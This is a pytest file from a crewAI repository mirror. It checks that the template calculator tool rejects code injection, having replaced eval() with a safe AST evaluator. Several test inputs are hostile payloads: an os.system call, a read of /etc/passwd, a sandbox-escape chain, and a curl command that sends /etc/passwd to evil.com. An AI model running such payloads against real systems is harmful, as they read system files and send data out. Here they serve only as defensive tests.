mirror of
https://github.com/crewAIInc/crewAI.git
synced 2026-04-30 23:02:50 +00:00
The Calculator tool example in the AGENTS.md template used eval() on unsanitized LLM input, creating a remote code execution vulnerability in every new CrewAI project. Replace eval() with an AST-based evaluator that only supports arithmetic operators (+, -, *, /, **) and numeric literals, preventing arbitrary code execution while preserving calculator functionality. Closes #5056 Co-Authored-By: João <joao@crewai.com>
185 lines
5.6 KiB
Python
185 lines
5.6 KiB
Python
"""Tests for the safe calculator tool pattern in the AGENTS.md template.
|
||
|
||
Verifies that the calculator example uses a safe AST-based evaluator
|
||
instead of eval(), and that it correctly handles both valid math
|
||
expressions and rejects malicious code injection attempts.
|
||
"""
|
||
|
||
import ast
|
||
import operator
|
||
import re
|
||
from pathlib import Path
|
||
|
||
import pytest
|
||
|
||
# ---------------------------------------------------------------------------
|
||
# Extract and compile the calculator function from the AGENTS.md template
|
||
# so that the tests always stay in sync with the shipped code.
|
||
# ---------------------------------------------------------------------------
|
||
|
||
TEMPLATE_PATH = (
|
||
Path(__file__).resolve().parents[2]
|
||
/ "src"
|
||
/ "crewai"
|
||
/ "cli"
|
||
/ "templates"
|
||
/ "AGENTS.md"
|
||
)
|
||
|
||
|
||
def _extract_calculator_source() -> str:
|
||
"""Return the Python source of the Calculator tool block in AGENTS.md."""
|
||
content = TEMPLATE_PATH.read_text()
|
||
|
||
# Find the code block after "### Using @tool Decorator"
|
||
pattern = r"### Using @tool Decorator\s*```python\s*(.*?)```"
|
||
match = re.search(pattern, content, re.DOTALL)
|
||
assert match, "Could not find Calculator code block in AGENTS.md"
|
||
return match.group(1)
|
||
|
||
|
||
def _build_calculator():
|
||
"""Compile the calculator code from the template and return the function.
|
||
|
||
We deliberately avoid importing crewai.tools so that the test does not
|
||
need the full crewai stack. The @tool decorator is replaced with a
|
||
no-op so we get the plain function.
|
||
"""
|
||
source = _extract_calculator_source()
|
||
|
||
# Replace the crewai-specific import and decorator with a no-op
|
||
source = source.replace("from crewai.tools import tool", "")
|
||
source = source.replace('@tool("Calculator")', "")
|
||
|
||
namespace: dict = {}
|
||
exec(source, namespace) # noqa: S102 – we control the source
|
||
return namespace["calculator"]
|
||
|
||
|
||
calculator = _build_calculator()
|
||
|
||
|
||
# ---- Valid arithmetic expressions ----
|
||
|
||
|
||
class TestSafeCalculatorValidExpressions:
|
||
def test_addition(self):
|
||
assert calculator("2 + 3") == "5"
|
||
|
||
def test_subtraction(self):
|
||
assert calculator("10 - 4") == "6"
|
||
|
||
def test_multiplication(self):
|
||
assert calculator("6 * 7") == "42"
|
||
|
||
def test_division(self):
|
||
assert calculator("10 / 4") == "2.5"
|
||
|
||
def test_power(self):
|
||
assert calculator("2 ** 10") == "1024"
|
||
|
||
def test_unary_negative(self):
|
||
assert calculator("-5") == "-5"
|
||
|
||
def test_negative_in_expression(self):
|
||
assert calculator("-3 + 7") == "4"
|
||
|
||
def test_parentheses(self):
|
||
assert calculator("(2 + 3) * 4") == "20"
|
||
|
||
def test_nested_parentheses(self):
|
||
assert calculator("((1 + 2) * (3 + 4))") == "21"
|
||
|
||
def test_float_values(self):
|
||
assert calculator("3.14 * 2") == "6.28"
|
||
|
||
def test_complex_expression(self):
|
||
assert calculator("2 ** 3 + 5 * (10 - 3)") == "43"
|
||
|
||
def test_integer_division(self):
|
||
assert calculator("9 / 3") == "3.0"
|
||
|
||
|
||
# ---- Malicious / unsafe expressions ----
|
||
|
||
|
||
class TestSafeCalculatorRejectsMaliciousInput:
|
||
"""The calculator MUST reject anything that is not pure arithmetic."""
|
||
|
||
def test_rejects_import_os(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("__import__('os').system('echo pwned')")
|
||
|
||
def test_rejects_eval(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("eval('1+1')")
|
||
|
||
def test_rejects_exec(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("exec('print(1)')")
|
||
|
||
def test_rejects_open_file(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("open('/etc/passwd').read()")
|
||
|
||
def test_rejects_dunder_access(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("().__class__.__bases__[0].__subclasses__()")
|
||
|
||
def test_rejects_string_literals(self):
|
||
with pytest.raises(ValueError):
|
||
calculator("'hello'")
|
||
|
||
def test_rejects_list_comprehension(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("[x for x in range(10)]")
|
||
|
||
def test_rejects_lambda(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("(lambda: 1)()")
|
||
|
||
def test_rejects_attribute_access(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("(1).__class__")
|
||
|
||
def test_rejects_variable_names(self):
|
||
with pytest.raises(ValueError):
|
||
calculator("x + 1")
|
||
|
||
def test_rejects_curl_exfiltration(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator(
|
||
"__import__('os').system("
|
||
"'curl https://evil.com/exfil?data=' + "
|
||
"open('/etc/passwd').read())"
|
||
)
|
||
|
||
def test_rejects_semicolon_statement(self):
|
||
with pytest.raises(SyntaxError):
|
||
calculator("1; import os")
|
||
|
||
def test_rejects_walrus_operator(self):
|
||
with pytest.raises((ValueError, SyntaxError)):
|
||
calculator("(x := 42)")
|
||
|
||
def test_rejects_boolean_ops(self):
|
||
with pytest.raises(ValueError):
|
||
calculator("True and False")
|
||
|
||
|
||
# ---- Template sanity check ----
|
||
|
||
|
||
class TestTemplateDoesNotContainEval:
|
||
"""Ensure the AGENTS.md template no longer ships raw eval()."""
|
||
|
||
def test_no_bare_eval_in_calculator_block(self):
|
||
source = _extract_calculator_source()
|
||
# The word "eval" may appear in _safe_eval or ast-related names,
|
||
# but a bare `eval(` call on its own line must not exist.
|
||
assert "return str(eval(expression))" not in source
|
||
|
||
def test_template_uses_ast_parse(self):
|
||
source = _extract_calculator_source()
|
||
assert "ast.parse" in source
|